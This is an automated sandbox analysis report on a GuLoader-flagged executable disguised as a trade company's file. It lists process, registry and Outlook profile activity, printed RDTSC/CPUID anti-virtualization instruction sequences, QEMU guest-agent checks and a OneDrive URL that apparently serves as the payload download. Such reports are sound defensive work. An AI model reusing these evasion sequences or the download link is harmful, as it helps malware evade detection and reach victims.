    Source: unknownProcess created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4a04656d-52aa-49de-8a09-cb178760e748}\InProcServer32
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_00407A2B push esp; retf
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1636D push ebp; ret
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10062 push esi; iretd
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10005 push esi; iretd
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess information set: NOGPFAULTERRORBOX

    Malware Analysis System Evasion:

    barindex
    Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10F36 TerminateProcess,LoadLibraryA,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FD4
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FCE
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FF2
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D111F5 TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D135F9
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10BEC NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19FEC
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1A18A
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D8D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10F51 TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D11546 TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1374E
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D10F77 TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D18F7D
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1131A TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D12B1E
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D11107 TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D39
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19F3A
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D134D3
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19E75
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1347D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1141F TerminateProcess,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D13827
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D19586 second address: 0000000003D19586 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D1B185 second address: 0000000003D1B185 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D162DB second address: 0000000003D162DB instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D1A3AE second address: 0000000003D1A247 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h 0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h 0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh 0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] 0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch 0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al 0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx 0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx 0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh 0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h 0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] 0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] 0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h 0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h 0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D15953 second address: 0000000003D15953 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 000000000056392D second address: 000000000056392D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx 0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx 0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh 0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh 0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax 0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx 0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h 0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 00000000005642E1 second address: 00000000005642E1 instructions:
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: C:\Program Files\qga\qga.exe
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp, KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=7B0580AA0B18AE44&RESID=7B0580AA0B18AE44%21106&AUTHKEY=ANQAOZGBUZCFLEEWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D19586 second address: 0000000003D19586 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D1B185 second address: 0000000003D1B185 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D1A36A second address: 0000000003D1A381 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor edi, ED27E950h 0x00000011 pushad 0x00000012 mov eax, 000000C6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D162DB second address: 0000000003D162DB instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D1A3AE second address: 0000000003D1A247 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h 0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h 0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh 0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] 0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch 0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al 0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx 0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx 0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh 0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h 0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] 0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] 0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h 0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h 0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D15953 second address: 0000000003D15953 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 000000000056A36A second address: 000000000056A381 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor edi, ED27E950h 0x00000011 pushad 0x00000012 mov eax, 000000C6h 0x00000017 rdtsc
